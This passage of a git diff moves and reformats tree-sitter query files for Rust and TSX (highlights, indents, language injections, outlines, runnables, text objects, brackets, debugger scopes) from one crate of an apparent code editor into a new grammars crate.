@debug-variable "^[A-Z]")) + +(macro_invocation + (token_tree + (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]"))) + +(block) @debug-scope diff --git a/crates/languages/src/rust/highlights.scm b/crates/grammars/src/rust/highlights.scm similarity index 63% rename from crates/languages/src/rust/highlights.scm rename to crates/grammars/src/rust/highlights.scm index 82008d701536177cbe7cab8d6fc6c82e0568e944..57e5ed3f704dcd70974b73e0a0d4e31253191048 100644 --- a/crates/languages/src/rust/highlights.scm +++ b/crates/grammars/src/rust/highlights.scm @@ -1,17 +1,33 @@ (identifier) @variable + (metavariable) @variable + (type_identifier) @type + (fragment_specifier) @type + (primitive_type) @type.builtin + (self) @variable.special + (field_identifier) @property + (shorthand_field_identifier) @property -(trait_item name: (type_identifier) @type.interface) -(impl_item trait: (type_identifier) @type.interface) -(abstract_type trait: (type_identifier) @type.interface) -(dynamic_type trait: (type_identifier) @type.interface) -(trait_bounds (type_identifier) @type.interface) +(trait_item + name: (type_identifier) @type.interface) + +(impl_item + trait: (type_identifier) @type.interface) + +(abstract_type + trait: (type_identifier) @type.interface) + +(dynamic_type + trait: (type_identifier) @type.interface) + +(trait_bounds + (type_identifier) @type.interface) (call_expression function: [ @@ -31,8 +47,11 @@ field: (field_identifier) @function.method) ]) -(function_item name: (identifier) @function.definition) -(function_signature_item name: (identifier) @function.definition) +(function_item + name: (identifier) @function.definition) + +(function_signature_item + name: (identifier) @function.definition) (macro_invocation macro: [ @@ -48,17 +67,17 @@ name: (identifier) @function.special.definition) ; Identifier conventions - ; Assume uppercase names are types/enum-constructors ((identifier) @type - (#match? @type "^[A-Z]")) + (#match? 
@type "^[A-Z]")) ; Assume all-caps names are constants ((identifier) @constant - (#match? @constant "^_*[A-Z][A-Z\\d_]*$")) + (#match? @constant "^_*[A-Z][A-Z\\d_]*$")) ; Ensure enum variants are highlighted correctly regardless of naming convention -(enum_variant name: (identifier) @type) +(enum_variant + name: (identifier) @type) [ "(" @@ -81,9 +100,7 @@ "::" ] @punctuation.delimiter -[ - "#" -] @punctuation.special +"#" @punctuation.special [ "as" @@ -131,7 +148,7 @@ ] @keyword.control (for_expression - ("for" @keyword.control)) + "for" @keyword.control) [ (string_literal) @@ -154,8 +171,10 @@ ] @comment [ - (line_comment (doc_comment)) - (block_comment (doc_comment)) + (line_comment + (doc_comment)) + (block_comment + (doc_comment)) ] @comment.doc [ @@ -198,25 +217,44 @@ ] @operator ; Avoid highlighting these as operators when used in doc comments. -(unary_expression "!" @operator) +(unary_expression + "!" @operator) + operator: "/" @operator (lifetime "'" @lifetime (identifier) @lifetime) -(parameter (identifier) @variable.parameter) - -(attribute_item (attribute [ - (identifier) @attribute - (scoped_identifier name: (identifier) @attribute) - (token_tree (identifier) @attribute (#match? @attribute "^[a-z\\d_]*$")) - (token_tree (identifier) @none "::" (#match? @none "^[a-z\\d_]*$")) -])) - -(inner_attribute_item (attribute [ - (identifier) @attribute - (scoped_identifier name: (identifier) @attribute) - (token_tree (identifier) @attribute (#match? @attribute "^[a-z\\d_]*$")) - (token_tree (identifier) @none "::" (#match? @none "^[a-z\\d_]*$")) -])) +(parameter + (identifier) @variable.parameter) + +(attribute_item + (attribute + [ + (identifier) @attribute + (scoped_identifier + name: (identifier) @attribute) + (token_tree + (identifier) @attribute + (#match? @attribute "^[a-z\\d_]*$")) + (token_tree + (identifier) @none + "::" + (#match? 
@none "^[a-z\\d_]*$")) + ])) + +(inner_attribute_item + (attribute + [ + (identifier) @attribute + (scoped_identifier + name: (identifier) @attribute) + (token_tree + (identifier) @attribute + (#match? @attribute "^[a-z\\d_]*$")) + (token_tree + (identifier) @none + "::" + (#match? @none "^[a-z\\d_]*$")) + ])) diff --git a/crates/grammars/src/rust/indents.scm b/crates/grammars/src/rust/indents.scm new file mode 100644 index 0000000000000000000000000000000000000000..b4ef2ebcd78016de1092e718385ab52a89273003 --- /dev/null +++ b/crates/grammars/src/rust/indents.scm @@ -0,0 +1,26 @@ +[ + ((where_clause) + _ @end) + (field_expression) + (call_expression) + (assignment_expression) + (let_declaration) + (let_chain) + (await_expression) +] @indent + +(_ + "[" + "]" @end) @indent + +(_ + "<" + ">" @end) @indent + +(_ + "{" + "}" @end) @indent + +(_ + "(" + ")" @end) @indent diff --git a/crates/grammars/src/rust/injections.scm b/crates/grammars/src/rust/injections.scm new file mode 100644 index 0000000000000000000000000000000000000000..89d839282d3388f450f9ebdb923167f0986f349c --- /dev/null +++ b/crates/grammars/src/rust/injections.scm @@ -0,0 +1,67 @@ +([ + (line_comment) + (block_comment) +] @injection.content + (#set! injection.language "comment")) + +(macro_invocation + macro: [ + (identifier) @_macro_name + (scoped_identifier + (identifier) @_macro_name .) + ] + (#not-any-of? @_macro_name "view" "html") + (token_tree) @injection.content + (#set! injection.language "rust")) + +; we need a better way for the leptos extension to declare that +; it wants to inject inside of rust, instead of modifying the rust +; injections to support leptos injections +(macro_invocation + macro: [ + (identifier) @_macro_name + (scoped_identifier + (identifier) @_macro_name .) + ] + (#any-of? @_macro_name "view" "html") + (token_tree) @injection.content + (#set! 
injection.language "rstml")) + +(macro_invocation + macro: [ + (identifier) @_macro_name + (scoped_identifier + (identifier) @_macro_name .) + ] + (#any-of? @_macro_name "sql") + (_) @injection.content + (#set! injection.language "sql")) + +; lazy_regex +(macro_invocation + macro: [ + (identifier) @_macro_name + (scoped_identifier + (identifier) @_macro_name .) + ] + (token_tree + [ + (string_literal + (string_content) @injection.content) + (raw_string_literal + (string_content) @injection.content) + ]) + (#set! injection.language "regex") + (#any-of? @_macro_name "regex" "bytes_regex")) + +(call_expression + function: (scoped_identifier) @_fn_path + arguments: (arguments + [ + (string_literal + (string_content) @injection.content) + (raw_string_literal + (string_content) @injection.content) + ]) + (#match? @_fn_path ".*Regex(Builder)?::new") + (#set! injection.language "regex")) diff --git a/crates/grammars/src/rust/outline.scm b/crates/grammars/src/rust/outline.scm new file mode 100644 index 0000000000000000000000000000000000000000..03ecb99facdc99cb0be8e2fb6bd4e177cb936b4e --- /dev/null +++ b/crates/grammars/src/rust/outline.scm @@ -0,0 +1,81 @@ +(attribute_item) @annotation + +(line_comment) @annotation + +(struct_item + (visibility_modifier)? @context + "struct" @context + name: (_) @name) @item + +(enum_item + (visibility_modifier)? @context + "enum" @context + name: (_) @name) @item + +(enum_variant + (visibility_modifier)? @context + name: (_) @name) @item + +(impl_item + "impl" @context + trait: (_)? @name + "for"? @context + type: (_) @name + body: (_ + . + "{" @open + "}" @close .)) @item + +(trait_item + (visibility_modifier)? @context + "trait" @context + name: (_) @name) @item + +(function_item + (visibility_modifier)? @context + (function_modifiers)? @context + "fn" @context + name: (_) @name + body: (_ + . + "{" @open + "}" @close .)) @item + +(function_signature_item + (visibility_modifier)? @context + (function_modifiers)? 
@context + "fn" @context + name: (_) @name) @item + +(macro_definition + . + "macro_rules!" @context + name: (_) @name) @item + +(mod_item + (visibility_modifier)? @context + "mod" @context + name: (_) @name) @item + +(type_item + (visibility_modifier)? @context + "type" @context + name: (_) @name) @item + +(associated_type + "type" @context + name: (_) @name) @item + +(const_item + (visibility_modifier)? @context + "const" @context + name: (_) @name) @item + +(static_item + (visibility_modifier)? @context + "static" @context + name: (_) @name) @item + +(field_declaration + (visibility_modifier)? @context + name: (_) @name) @item diff --git a/crates/languages/src/rust/overrides.scm b/crates/grammars/src/rust/overrides.scm similarity index 99% rename from crates/languages/src/rust/overrides.scm rename to crates/grammars/src/rust/overrides.scm index 91fa6139d387db97676cd32a84433b16f3c8e94e..039425a91d519b2b4b030a37ad9e71705833820e 100644 --- a/crates/languages/src/rust/overrides.scm +++ b/crates/grammars/src/rust/overrides.scm @@ -2,6 +2,7 @@ (string_literal) (raw_string_literal) ] @string + [ (line_comment) (block_comment) diff --git a/crates/grammars/src/rust/runnables.scm b/crates/grammars/src/rust/runnables.scm new file mode 100644 index 0000000000000000000000000000000000000000..ef7050397df586ebb96c2648ea3be282d246e5aa --- /dev/null +++ b/crates/grammars/src/rust/runnables.scm @@ -0,0 +1,75 @@ +; Rust mod test +((attribute_item + (attribute + (identifier) @_attribute + arguments: ((token_tree + (identifier) @_test) + (#eq? @_test "test"))) + (#eq? @_attribute "cfg")) + . + (mod_item + name: (_) @run) + (#set! tag rust-mod-test)) + +; Rust test +(((attribute_item + (attribute + [ + (identifier) @_attribute + (scoped_identifier + (identifier) @_attribute) + ]) + (#match? @_attribute "test")) @_start + . + (attribute_item)* + . + [ + (line_comment) + (block_comment) + ]* + . + (function_item + name: (_) @run @_test_name + body: _) @_end) + (#set! 
tag rust-test)) + +; Rust doc test +(((line_comment)* + (line_comment + doc: (_) @_comment_content) @_start @run + (#match? @_comment_content "```") + . + (line_comment)* + . + (line_comment + doc: (_) @_end_comment_content) @_end_code_block + (#match? @_end_comment_content "```") + . + (line_comment)* + (attribute_item)* + . + [ + (function_item + name: (_) @_doc_test_name + body: _) + (function_signature_item + name: (_) @_doc_test_name) + (struct_item + name: (_) @_doc_test_name) + (enum_item + name: (_) @_doc_test_name + body: _) + ((attribute_item)? + (macro_definition + name: (_) @_doc_test_name)) + (mod_item + name: (_) @_doc_test_name) + ] @_end) + (#set! tag rust-doc-test)) + +; Rust main function +(((function_item + name: (_) @run + body: _) @_rust_main_function_end + (#eq? @run "main")) + (#set! tag rust-main)) diff --git a/crates/languages/src/rust/semantic_token_rules.json b/crates/grammars/src/rust/semantic_token_rules.json similarity index 100% rename from crates/languages/src/rust/semantic_token_rules.json rename to crates/grammars/src/rust/semantic_token_rules.json diff --git a/crates/grammars/src/rust/textobjects.scm b/crates/grammars/src/rust/textobjects.scm new file mode 100644 index 0000000000000000000000000000000000000000..97a90a54f800942eb733a9bd494b6e56e191a3ec --- /dev/null +++ b/crates/grammars/src/rust/textobjects.scm @@ -0,0 +1,74 @@ +; functions +(function_signature_item) @function.around + +(function_item + body: (_ + "{" + (_)* @function.inside + "}")) @function.around + +; classes +(struct_item + body: (_ + [ + "{" + "(" + ]? + [ + (_) + ","? + ]* @class.inside + [ + "}" + ")" + ]?)) @class.around + +(enum_item + body: (_ + "{" + [ + (_) + ","? + ]* @class.inside + "}")) @class.around + +(union_item + body: (_ + "{" + [ + (_) + ","? + ]* @class.inside + "}")) @class.around + +(trait_item + body: (_ + "{" + [ + (_) + ","? + ]* @class.inside + "}")) @class.around + +(impl_item + body: (_ + "{" + [ + (_) + ","? 
+ ]* @class.inside + "}")) @class.around + +(mod_item + body: (_ + "{" + [ + (_) + ","? + ]* @class.inside + "}")) @class.around + +; comments +(line_comment)+ @comment.around + +(block_comment) @comment.around diff --git a/crates/grammars/src/tsx/brackets.scm b/crates/grammars/src/tsx/brackets.scm new file mode 100644 index 0000000000000000000000000000000000000000..cd59d553783f685775e45ba883210272b168c3b8 --- /dev/null +++ b/crates/grammars/src/tsx/brackets.scm @@ -0,0 +1,38 @@ +("(" @open + ")" @close) + +("[" @open + "]" @close) + +("{" @open + "}" @close) + +(("<" @open + ">" @close) + (#set! rainbow.exclude)) + +(("<" @open + "/>" @close) + (#set! rainbow.exclude)) + +(("" @close) + (#set! rainbow.exclude)) + +(("\"" @open + "\"" @close) + (#set! rainbow.exclude)) + +(("'" @open + "'" @close) + (#set! rainbow.exclude)) + +(("`" @open + "`" @close) + (#set! rainbow.exclude)) + +((jsx_element + (jsx_opening_element) @open + (jsx_closing_element) @close) + (#set! newline.only) + (#set! 
rainbow.exclude)) diff --git a/crates/languages/src/tsx/config.toml b/crates/grammars/src/tsx/config.toml similarity index 98% rename from crates/languages/src/tsx/config.toml rename to crates/grammars/src/tsx/config.toml index d0a4eb6532db621d741df2fbc99125e1c037ccdf..42438fdf890a98f319244332f384f574e02c2904 100644 --- a/crates/languages/src/tsx/config.toml +++ b/crates/grammars/src/tsx/config.toml @@ -1,6 +1,7 @@ name = "TSX" grammar = "tsx" path_suffixes = ["tsx"] +modeline_aliases = ["typescript-txs"] line_comments = ["// "] block_comment = { start = "/*", prefix = "* ", end = "*/", tab_size = 1 } documentation_comment = { start = "/**", prefix = "* ", end = "*/", tab_size = 1 } diff --git a/crates/grammars/src/tsx/debugger.scm b/crates/grammars/src/tsx/debugger.scm new file mode 100644 index 0000000000000000000000000000000000000000..5a6ab143d0dbed601534cc214bd017fcf5c29a41 --- /dev/null +++ b/crates/grammars/src/tsx/debugger.scm @@ -0,0 +1,55 @@ +(lexical_declaration + (variable_declarator + name: (identifier) @debug-variable)) + +(for_in_statement + left: (identifier) @debug-variable) + +(for_statement + initializer: (lexical_declaration + (variable_declarator + name: (identifier) @debug-variable))) + +(binary_expression + left: (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(binary_expression + right: (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(unary_expression + argument: (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(update_expression + argument: (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(return_statement + (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(parenthesized_expression + (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(jsx_expression + (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(array + (identifier) @debug-variable + (#not-match? 
@debug-variable "^[A-Z]")) + +(pair + value: (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(member_expression + object: (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(statement_block) @debug-scope + +(program) @debug-scope diff --git a/crates/languages/src/tsx/highlights.scm b/crates/grammars/src/tsx/highlights.scm similarity index 63% rename from crates/languages/src/tsx/highlights.scm rename to crates/grammars/src/tsx/highlights.scm index a96bf96281fd90a77a3411d1ad909f22c12ac0df..0f203e7112cf14268d0edfed39b5624375d1a859 100644 --- a/crates/languages/src/tsx/highlights.scm +++ b/crates/grammars/src/tsx/highlights.scm @@ -1,56 +1,33 @@ ; Variables - (identifier) @variable (call_expression function: (member_expression object: (identifier) @type - (#any-of? - @type - "Promise" - "Array" - "Object" - "Map" - "Set" - "WeakMap" - "WeakSet" - "Date" - "Error" - "TypeError" - "RangeError" - "SyntaxError" - "ReferenceError" - "EvalError" - "URIError" - "RegExp" - "Function" - "Number" - "String" - "Boolean" - "Symbol" - "BigInt" - "Proxy" - "ArrayBuffer" - "DataView" - ) - ) -) + (#any-of? 
@type + "Promise" "Array" "Object" "Map" "Set" "WeakMap" "WeakSet" "Date" "Error" "TypeError" + "RangeError" "SyntaxError" "ReferenceError" "EvalError" "URIError" "RegExp" "Function" + "Number" "String" "Boolean" "Symbol" "BigInt" "Proxy" "ArrayBuffer" "DataView"))) ; Properties - (property_identifier) @property + (shorthand_property_identifier) @property + (shorthand_property_identifier_pattern) @property + (private_property_identifier) @property ; Function and method calls - (call_expression function: (identifier) @function) (call_expression function: (member_expression - property: [(property_identifier) (private_property_identifier)] @function.method)) + property: [ + (property_identifier) + (private_property_identifier) + ] @function.method)) (new_expression constructor: (identifier) @type) @@ -59,36 +36,58 @@ module: (identifier) @type) ; Function and method definitions - (function_expression name: (identifier) @function) + (function_declaration name: (identifier) @function) + (method_definition - name: [(property_identifier) (private_property_identifier)] @function.method) + name: [ + (property_identifier) + (private_property_identifier) + ] @function.method) + (method_definition - name: (property_identifier) @constructor - (#eq? @constructor "constructor")) + name: (property_identifier) @constructor + (#eq? 
@constructor "constructor")) (pair - key: [(property_identifier) (private_property_identifier)] @function.method - value: [(function_expression) (arrow_function)]) + key: [ + (property_identifier) + (private_property_identifier) + ] @function.method + value: [ + (function_expression) + (arrow_function) + ]) (assignment_expression left: (member_expression - property: [(property_identifier) (private_property_identifier)] @function.method) - right: [(function_expression) (arrow_function)]) + property: [ + (property_identifier) + (private_property_identifier) + ] @function.method) + right: [ + (function_expression) + (arrow_function) + ]) (variable_declarator name: (identifier) @function - value: [(function_expression) (arrow_function)]) + value: [ + (function_expression) + (arrow_function) + ]) (assignment_expression left: (identifier) @function - right: [(function_expression) (arrow_function)]) + right: [ + (function_expression) + (arrow_function) + ]) ; Parameters - (required_parameter (identifier) @variable.parameter) @@ -122,9 +121,10 @@ name: (identifier) @variable.parameter) ; Special identifiers - (type_annotation) @type + (type_identifier) @type + (predefined_type) @type.builtin (type_alias_declaration @@ -153,12 +153,12 @@ (identifier) (shorthand_property_identifier) (shorthand_property_identifier_pattern) - ] @constant - (#match? @constant "^_*[A-Z_][A-Z\\d_]*$")) +] @constant + (#match? @constant "^_*[A-Z_][A-Z\\d_]*$")) ; Literals - (this) @variable.special + (super) @variable.special [ @@ -182,11 +182,12 @@ (escape_sequence) @string.escape (regex) @string.regex + (regex_flags) @keyword.operator.regex + (number) @number ; Tokens - [ ";" "?." @@ -244,7 +245,8 @@ "..." ] @operator -(regex "/" @string.regex) +(regex + "/" @string.regex) [ "(" @@ -253,21 +255,19 @@ "]" "{" "}" -] @punctuation.bracket +] @punctuation.bracket (ternary_expression [ "?" 
":" - ] @operator -) + ] @operator) ; Keywords [ "abstract" "as" "async" - "await" "debugger" "declare" "default" @@ -317,6 +317,7 @@ ] @keyword.import [ + "await" "break" "case" "catch" @@ -334,7 +335,8 @@ "yield" ] @keyword.control -(switch_default "default" @keyword.control) +(switch_default + "default" @keyword.control) (template_substitution "${" @punctuation.special @@ -352,31 +354,32 @@ "<" @punctuation.bracket ">" @punctuation.bracket) -(decorator "@" @punctuation.special) +(decorator + "@" @punctuation.special) (union_type - ("|") @punctuation.special) + "|" @punctuation.special) (intersection_type - ("&") @punctuation.special) + "&" @punctuation.special) (type_annotation - (":") @punctuation.special) + ":" @punctuation.special) (index_signature - (":") @punctuation.special) + ":" @punctuation.special) (type_predicate_annotation - (":") @punctuation.special) + ":" @punctuation.special) (public_field_definition - ("?") @punctuation.special) + "?" @punctuation.special) (property_signature - ("?") @punctuation.special) + "?" @punctuation.special) (method_signature - ("?") @punctuation.special) + "?" 
@punctuation.special) (optional_parameter ([ @@ -384,44 +387,66 @@ ":" ]) @punctuation.special) - - (jsx_opening_element [ - (identifier) @type + (identifier) @type @tag.component.jsx (member_expression - object: (identifier) @type - property: (property_identifier) @type - ) - ] -) + object: (identifier) @type @tag.component.jsx + property: (property_identifier) @type @tag.component.jsx) + ]) + (jsx_closing_element [ - (identifier) @type + (identifier) @type @tag.component.jsx (member_expression - object: (identifier) @type - property: (property_identifier) @type - ) - ] -) + object: (identifier) @type @tag.component.jsx + property: (property_identifier) @type @tag.component.jsx) + ]) + (jsx_self_closing_element [ - (identifier) @type + (identifier) @type @tag.component.jsx (member_expression - object: (identifier) @type - property: (property_identifier) @type - ) - ] -) - -(jsx_opening_element (identifier) @tag.jsx (#match? @tag.jsx "^[a-z][^.]*$")) -(jsx_closing_element (identifier) @tag.jsx (#match? @tag.jsx "^[a-z][^.]*$")) -(jsx_self_closing_element (identifier) @tag.jsx (#match? @tag.jsx "^[a-z][^.]*$")) - -(jsx_attribute (property_identifier) @attribute.jsx) -(jsx_opening_element (["<" ">"]) @punctuation.bracket.jsx) -(jsx_closing_element ([""]) @punctuation.bracket.jsx) -(jsx_self_closing_element (["<" "/>"]) @punctuation.bracket.jsx) -(jsx_attribute "=" @punctuation.delimiter.jsx) + object: (identifier) @type @tag.component.jsx + property: (property_identifier) @type @tag.component.jsx) + ]) + +(jsx_opening_element + (identifier) @tag.jsx + (#match? @tag.jsx "^[a-z][^.]*$")) + +(jsx_closing_element + (identifier) @tag.jsx + (#match? @tag.jsx "^[a-z][^.]*$")) + +(jsx_self_closing_element + (identifier) @tag.jsx + (#match? 
@tag.jsx "^[a-z][^.]*$")) + +(jsx_attribute + (property_identifier) @attribute.jsx) + +(jsx_opening_element + ([ + "<" + ">" + ]) @punctuation.bracket.jsx) + +(jsx_closing_element + ([ + "" + ]) @punctuation.bracket.jsx) + +(jsx_self_closing_element + ([ + "<" + "/>" + ]) @punctuation.bracket.jsx) + +(jsx_attribute + "=" @punctuation.delimiter.jsx) + (jsx_text) @text.jsx + (html_character_reference) @string.special diff --git a/crates/grammars/src/tsx/indents.scm b/crates/grammars/src/tsx/indents.scm new file mode 100644 index 0000000000000000000000000000000000000000..1e72160bca2f5fd04ce6d3bc7b02e9ab029eb018 --- /dev/null +++ b/crates/grammars/src/tsx/indents.scm @@ -0,0 +1,33 @@ +[ + (call_expression) + (assignment_expression) + (member_expression) + (lexical_declaration) + (variable_declaration) + (assignment_expression) + (if_statement) + (for_statement) +] @indent + +(_ + "[" + "]" @end) @indent + +(_ + "<" + ">" @end) @indent + +(_ + "{" + "}" @end) @indent + +(_ + "(" + ")" @end) @indent + +(jsx_opening_element + ">" @end) @indent + +(jsx_element + (jsx_opening_element) @start + (jsx_closing_element)? @end) @indent diff --git a/crates/grammars/src/tsx/injections.scm b/crates/grammars/src/tsx/injections.scm new file mode 100644 index 0000000000000000000000000000000000000000..fda53263f575238051d325cd5820a285f8f24259 --- /dev/null +++ b/crates/grammars/src/tsx/injections.scm @@ -0,0 +1,145 @@ +((comment) @injection.content + (#set! injection.language "comment")) + +(((comment) @_jsdoc_comment + (#match? @_jsdoc_comment "(?s)^/[*][*][^*].*[*]/$")) @injection.content + (#set! injection.language "jsdoc")) + +((regex) @injection.content + (#set! injection.language "regex")) + +(call_expression + function: (identifier) @_name + (#eq? @_name "css") + arguments: (template_string + (string_fragment) @injection.content + (#set! injection.language "css"))) + +(call_expression + function: (member_expression + object: (identifier) @_obj + (#eq? 
@_obj "styled") + property: (property_identifier)) + arguments: (template_string + (string_fragment) @injection.content + (#set! injection.language "css"))) + +(call_expression + function: (call_expression + function: (identifier) @_name + (#eq? @_name "styled")) + arguments: (template_string + (string_fragment) @injection.content + (#set! injection.language "css"))) + +(call_expression + function: (identifier) @_name + (#eq? @_name "html") + arguments: (template_string + (string_fragment) @injection.content + (#set! injection.language "html"))) + +(call_expression + function: (identifier) @_name + (#eq? @_name "js") + arguments: (template_string + (string_fragment) @injection.content + (#set! injection.language "javascript"))) + +(call_expression + function: (identifier) @_name + (#eq? @_name "json") + arguments: (template_string + (string_fragment) @injection.content + (#set! injection.language "json"))) + +(call_expression + function: (identifier) @_name + (#eq? @_name "sql") + arguments: (template_string + (string_fragment) @injection.content + (#set! injection.language "sql"))) + +(call_expression + function: (identifier) @_name + (#eq? @_name "ts") + arguments: (template_string + (string_fragment) @injection.content + (#set! injection.language "typescript"))) + +(call_expression + function: (identifier) @_name + (#match? @_name "^ya?ml$") + arguments: (template_string + (string_fragment) @injection.content + (#set! injection.language "yaml"))) + +(call_expression + function: (identifier) @_name + (#match? @_name "^g(raph)?ql$") + arguments: (template_string + (string_fragment) @injection.content + (#set! injection.language "graphql"))) + +(call_expression + function: (identifier) @_name + (#match? @_name "^g(raph)?ql$") + arguments: (arguments + (template_string + (string_fragment) @injection.content + (#set! injection.language "graphql")))) + +(call_expression + function: (identifier) @_name + (#match? 
@_name "^iso$") + arguments: (arguments + (template_string + (string_fragment) @injection.content + (#set! injection.language "isograph")))) + +; Parse the contents of strings and tagged template +; literals with leading ECMAScript comments: +; '/* html */' or '/*html*/' +(((comment) @_ecma_comment + [ + (string + (string_fragment) @injection.content) + (template_string + (string_fragment) @injection.content) + ]) + (#match? @_ecma_comment "^\\/\\*\\s*html\\s*\\*\\/") + (#set! injection.language "html")) + +; '/* sql */' or '/*sql*/' +(((comment) @_ecma_comment + [ + (string + (string_fragment) @injection.content) + (template_string + (string_fragment) @injection.content) + ]) + (#match? @_ecma_comment "^\\/\\*\\s*sql\\s*\\*\\/") + (#set! injection.language "sql")) + +; '/* gql */' or '/*gql*/' +; '/* graphql */' or '/*graphql*/' +(((comment) @_ecma_comment + [ + (string + (string_fragment) @injection.content) + (template_string + (string_fragment) @injection.content) + ]) + (#match? @_ecma_comment "^\\/\\*\\s*(gql|graphql)\\s*\\*\\/") + (#set! injection.language "graphql")) + +; '/* css */' or '/*css*/' +(((comment) @_ecma_comment + [ + (string + (string_fragment) @injection.content) + (template_string + (string_fragment) @injection.content) + ]) + (#match? @_ecma_comment "^\\/\\*\\s*(css)\\s*\\*\\/") + (#set! injection.language "css")) diff --git a/crates/grammars/src/tsx/outline.scm b/crates/grammars/src/tsx/outline.scm new file mode 100644 index 0000000000000000000000000000000000000000..37991965256a0def9b0458958ac4e50c6f337af6 --- /dev/null +++ b/crates/grammars/src/tsx/outline.scm @@ -0,0 +1,275 @@ +(internal_module + "namespace" @context + name: (_) @name) @item + +(enum_declaration + "enum" @context + name: (_) @name) @item + +(type_alias_declaration + "type" @context + name: (_) @name) @item + +(function_declaration + "async"? 
@context + "function" @context + name: (_) @name + parameters: (formal_parameters + "(" @context + ")" @context)) @item + +(generator_function_declaration + "async"? @context + "function" @context + "*" @context + name: (_) @name + parameters: (formal_parameters + "(" @context + ")" @context)) @item + +(interface_declaration + "interface" @context + name: (_) @name) @item + +(export_statement + (lexical_declaration + [ + "let" + "const" + ] @context + (variable_declarator + name: (identifier) @name) @item)) + +; Exported array destructuring +(export_statement + (lexical_declaration + [ + "let" + "const" + ] @context + (variable_declarator + name: (array_pattern + [ + (identifier) @name @item + (assignment_pattern + left: (identifier) @name @item) + (rest_pattern + (identifier) @name @item) + ])))) + +; Exported object destructuring +(export_statement + (lexical_declaration + [ + "let" + "const" + ] @context + (variable_declarator + name: (object_pattern + [ + (shorthand_property_identifier_pattern) @name @item + (pair_pattern + value: (identifier) @name @item) + (pair_pattern + value: (assignment_pattern + left: (identifier) @name @item)) + (rest_pattern + (identifier) @name @item) + ])))) + +(program + (lexical_declaration + [ + "let" + "const" + ] @context + (variable_declarator + name: (identifier) @name) @item)) + +; Top-level array destructuring +(program + (lexical_declaration + [ + "let" + "const" + ] @context + (variable_declarator + name: (array_pattern + [ + (identifier) @name @item + (assignment_pattern + left: (identifier) @name @item) + (rest_pattern + (identifier) @name @item) + ])))) + +; Top-level object destructuring +(program + (lexical_declaration + [ + "let" + "const" + ] @context + (variable_declarator + name: (object_pattern + [ + (shorthand_property_identifier_pattern) @name @item + (pair_pattern + value: (identifier) @name @item) + (pair_pattern + value: (assignment_pattern + left: (identifier) @name @item)) + (rest_pattern + (identifier) 
@name @item) + ])))) + +(class_declaration + "class" @context + name: (_) @name) @item + +(abstract_class_declaration + "abstract" @context + "class" @context + name: (_) @name) @item + +; Method definitions in classes (not in object literals) +(class_body + (method_definition + [ + "get" + "set" + "async" + "*" + "readonly" + "static" + (override_modifier) + (accessibility_modifier) + ]* @context + name: (_) @name + parameters: (formal_parameters + "(" @context + ")" @context)) @item) + +; Object literal methods +(variable_declarator + value: (object + (method_definition + [ + "get" + "set" + "async" + "*" + ]* @context + name: (_) @name + parameters: (formal_parameters + "(" @context + ")" @context)) @item)) + +(public_field_definition + [ + "declare" + "readonly" + "abstract" + "static" + (accessibility_modifier) + ]* @context + name: (_) @name) @item + +; Add support for (node:test, bun:test and Jest) runnable +((call_expression + function: [ + (identifier) @_name + (member_expression + object: [ + (identifier) @_name + (member_expression + object: (identifier) @_name) + ]) + ] @context + (#any-of? @_name "it" "test" "describe" "context" "suite") + arguments: (arguments + . + [ + (string + (string_fragment) @name) + (identifier) @name + ]))) @item + +; Add support for parameterized tests +((call_expression + function: (call_expression + function: (member_expression + object: [ + (identifier) @_name + (member_expression + object: (identifier) @_name) + ] + property: (property_identifier) @_property) + (#any-of? @_name "it" "test" "describe" "context" "suite") + (#any-of? @_property "each")) + arguments: (arguments + . 
+ [ + (string + (string_fragment) @name) + (identifier) @name + ]))) @item + +; Object properties +(pair + key: [ + (property_identifier) @name + (string + (string_fragment) @name) + (number) @name + (computed_property_name) @name + ]) @item + +; Nested variables in function bodies +(statement_block + (lexical_declaration + [ + "let" + "const" + ] @context + (variable_declarator + name: (identifier) @name) @item)) + +; Nested array destructuring in functions +(statement_block + (lexical_declaration + [ + "let" + "const" + ] @context + (variable_declarator + name: (array_pattern + [ + (identifier) @name @item + (assignment_pattern + left: (identifier) @name @item) + (rest_pattern + (identifier) @name @item) + ])))) + +; Nested object destructuring in functions +(statement_block + (lexical_declaration + [ + "let" + "const" + ] @context + (variable_declarator + name: (object_pattern + [ + (shorthand_property_identifier_pattern) @name @item + (pair_pattern + value: (identifier) @name @item) + (pair_pattern + value: (assignment_pattern + left: (identifier) @name @item)) + (rest_pattern + (identifier) @name @item) + ])))) + +(comment) @annotation diff --git a/crates/languages/src/tsx/overrides.scm b/crates/grammars/src/tsx/overrides.scm similarity index 50% rename from crates/languages/src/tsx/overrides.scm rename to crates/grammars/src/tsx/overrides.scm index f5a51af33fee340762d6b689e78d2e94e9c84901..759ffe8703ff27f53e5ccadb3eb4687a279f21f8 100644 --- a/crates/languages/src/tsx/overrides.scm +++ b/crates/grammars/src/tsx/overrides.scm @@ -2,7 +2,8 @@ (string) @string -(template_string (string_fragment) @string) +(template_string + (string_fragment) @string) (jsx_element) @element @@ -13,6 +14,7 @@ (jsx_expression) ] @default -(_ value: (call_expression - function: (identifier) @function_name_before_type_arguments - type_arguments: (type_arguments))) +(_ + value: (call_expression + function: (identifier) @function_name_before_type_arguments + type_arguments: 
